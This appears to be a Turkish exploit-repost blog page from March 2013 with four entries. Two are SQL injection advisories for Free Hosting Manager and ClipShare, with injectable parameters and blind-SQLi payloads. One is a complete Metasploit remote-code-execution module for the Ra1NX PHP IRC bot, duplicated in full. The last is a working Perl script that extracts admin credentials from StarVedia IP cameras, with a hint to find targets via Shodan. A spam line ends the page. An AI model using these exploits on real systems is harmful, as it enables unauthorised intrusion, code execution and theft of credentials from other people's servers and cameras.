admin | 25 Mart 2013
No comments

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injeçtion açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah ,                                
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In 
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is 

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this-> clientuser = $_COOKIE['clientuser'];
$this-> clientpass = $_COOKIE['clientpass'];
$this-> clientid = $_COOKIE['clientid'];
return true;

$dbquery = ("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm-> closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this-> clientid'") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm-> clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ") 

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher
Category: Genel | Tags:
admin | 25 Mart 2013
4 comments

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : 
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION[&#39;language&#39;]. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST[&#39;gid&#39;]) && is_numeric($_REQUEST[&#39;gid&#39;]) ) ? mysql_real_escape_string($_REQUEST[&#39;gid&#39;]) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac
Category: Genel | Tags: ,
admin | 25 Mart 2013
No comments

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
                super(update_info(info,
                        &#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
                        &#39;Description&#39;    =>  %q{
                                        This module allows remote command execution on the PHP IRC bot Ra1NX by
                                        using the public call feature in private message to covertly bypass the
                                        authentication system.
                                },
                        &#39;Author&#39;         =>
                                [
                                        &#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
                                ],
                        &#39;License&#39;        =>  MSF_LICENSE,
                        &#39;References&#39;     =>
                                [
                                        [&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
                                        [&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
                                        [&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
                                ],
                        &#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
                        &#39;Arch&#39;           =>  ARCH_CMD,
                        &#39;Payload&#39;        =>
                                {
                                        &#39;Space&#39;    =>  344,
                                        &#39;BadChars&#39; =>  &#39;&#39;,
                                        &#39;DisableNops&#39; =>  true,
                                        &#39;Compat&#39;      =>
                                                {
                                                        &#39;PayloadType&#39; =>  &#39;cmd&#39;,
                                                }
                                },
                        &#39;Targets&#39;  =>
                                [
                                        [ &#39;Ra1NX&#39;, { } ]
                                ],
                        &#39;Privileged&#39;     =>  false,
                        &#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
                        &#39;DefaultTarget&#39;  =>  0))

                register_options(
                        [
                                Opt::RPORT(6667),
                                OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
                                OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
                                OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
                                OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
                        ], self.class)
        end

        def check
                connect

                response = register(sock)
                if response =~ /463/ or response =~ /464/
                        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
                        return Exploit::CheckCode::Unknown
                end
                confirm_string = rand_text_alpha(8)
                response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
                print response
                quit(sock)
                disconnect

                if response =~ /#{confirm_string}/
                        return Exploit::CheckCode::Vulnerable
                else
                        return Exploit::CheckCode::Safe
                end
        end

        def send_msg(sock, data)
                sock.put(data)
                data = ""
                begin
                        read_data = sock.get_once(-1, 1)
                        while not read_data.nil?
                                data  < < read_data
                                read_data = sock.get_once(-1, 1)
                        end
                rescue EOFError
                end
                data
        end

        def register(sock)
                msg = ""

                if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
                        msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
                end

                if datastore[&#39;NICK&#39;].length >  9
                        nick = rand_text_alpha(9)
                        print_error("The nick is longer than 9 characters, using #{nick}")
                else
                        nick = datastore[&#39;NICK&#39;]
                end

                msg  < < "NICK #{nick}rn"
                msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

                response = send_msg(sock,msg)
                return response
        end

        def ra1nx_command(sock)
                encoded = payload.encoded
                command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
                response = send_msg(sock, command_msg)
                return response
        end

        def quit(sock)
                quit_msg = "QUIT :bye byern"
                sock.put(quit_msg)
        end

        def exploit
                connect

                print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
                response = register(sock)
                if response =~ /463/ or response =~ /464/
                        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
                        return
                end

                print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
                ra1nx_command(sock)

                quit(sock)
                disconnect
        end
end
Category: Genel | Tags:
admin | 25 Mart 2013
No comments

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
                super(update_info(info,
                        &#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
                        &#39;Description&#39;    =>  %q{
                                        This module allows remote command execution on the PHP IRC bot Ra1NX by
                                        using the public call feature in private message to covertly bypass the
                                        authentication system.
                                },
                        &#39;Author&#39;         => 
                                [
                                        &#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
                                ],
                        &#39;License&#39;        =>  MSF_LICENSE,
                        &#39;References&#39;     => 
                                [
                                        [&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
                                        [&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
                                        [&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
                                ],
                        &#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
                        &#39;Arch&#39;           =>  ARCH_CMD,
                        &#39;Payload&#39;        => 
                                {
                                        &#39;Space&#39;    =>  344,
                                        &#39;BadChars&#39; =>  &#39;&#39;,
                                        &#39;DisableNops&#39; =>  true,
                                        &#39;Compat&#39;      => 
                                                {
                                                        &#39;PayloadType&#39; =>  &#39;cmd&#39;,
                                                }
                                },
                        &#39;Targets&#39;  => 
                                [
                                        [ &#39;Ra1NX&#39;, { } ]
                                ],
                        &#39;Privileged&#39;     =>  false,
                        &#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
                        &#39;DefaultTarget&#39;  =>  0))

                register_options(
                        [
                                Opt::RPORT(6667),
                                OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
                                OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
                                OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
                                OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
                        ], self.class)
        end

        def check
                connect

                response = register(sock)
                if response =~ /463/ or response =~ /464/
                        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
                        return Exploit::CheckCode::Unknown
                end
                confirm_string = rand_text_alpha(8)
                response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
                print response
                quit(sock)
                disconnect

                if response =~ /#{confirm_string}/
                        return Exploit::CheckCode::Vulnerable
                else
                        return Exploit::CheckCode::Safe
                end
        end

        def send_msg(sock, data)
                sock.put(data)
                data = ""
                begin
                        read_data = sock.get_once(-1, 1)
                        while not read_data.nil?
                                data  < < read_data
                                read_data = sock.get_once(-1, 1)
                        end
                rescue EOFError
                end
                data
        end

        def register(sock)
                msg = ""

                if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
                        msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
                end

                if datastore[&#39;NICK&#39;].length >  9
                        nick = rand_text_alpha(9)
                        print_error("The nick is longer than 9 characters, using #{nick}")
                else
                        nick = datastore[&#39;NICK&#39;]
                end

                msg  < < "NICK #{nick}rn"
                msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

                response = send_msg(sock,msg)
                return response
        end

        def ra1nx_command(sock)
                encoded = payload.encoded
                command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
                response = send_msg(sock, command_msg)
                return response
        end

        def quit(sock)
                quit_msg = "QUIT :bye byern"
                sock.put(quit_msg)
        end

        def exploit
                connect

                print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
                response = register(sock)
                if response =~ /463/ or response =~ /464/
                        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
                        return
                end

                print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
                ra1nx_command(sock)

                quit(sock)
                disconnect
        end
end
Category: Genel | Tags:
admin | 25 Mart 2013
No comments

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure Açığına ilişkin perl exploit aşağıdaki gibidir.

#!/usr/bin/perl
#
#  [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life 
#  and all my other friends for the help and support which 
#  gives me. Kind regards to all of you, who read my lil&#39; 
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  ?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if ( == 0) {&usg;}
while ( >  0) {
$type = shift;
$t = shift;
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!n");
print " [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploitn";
print " [!] Exploiting: $tn";
if ($r =~ m/ <INPUT type=text name=user size=20 maxlength=19 value="(.*)"> /g) {
$result .= "   [o] User: $1n";
}else{die(" Try another exploit, $!");}     
if ($r =~ m/ <INPUT type=password name=passwd size=20 maxlength=19 value="(.*)"> /g){
$result .= "   [o] Password: $1n";
}else{die("Try another exploit or restart the exploitn");}
sleep(1);
print " [m/] BINGO!!!na".$result; 
}
sub usg(){
print " [!] usg: perl $0 [-r or -d]  <victim:port> n";
print " [!]  -d: disclosure password optionn";
print " [!] exp: perl $0 -d 127.0.0.1 :)n";
exit;
}
Category: Genel | Tags: ,
« Older Entries   Recent Entries »
escort bayan escort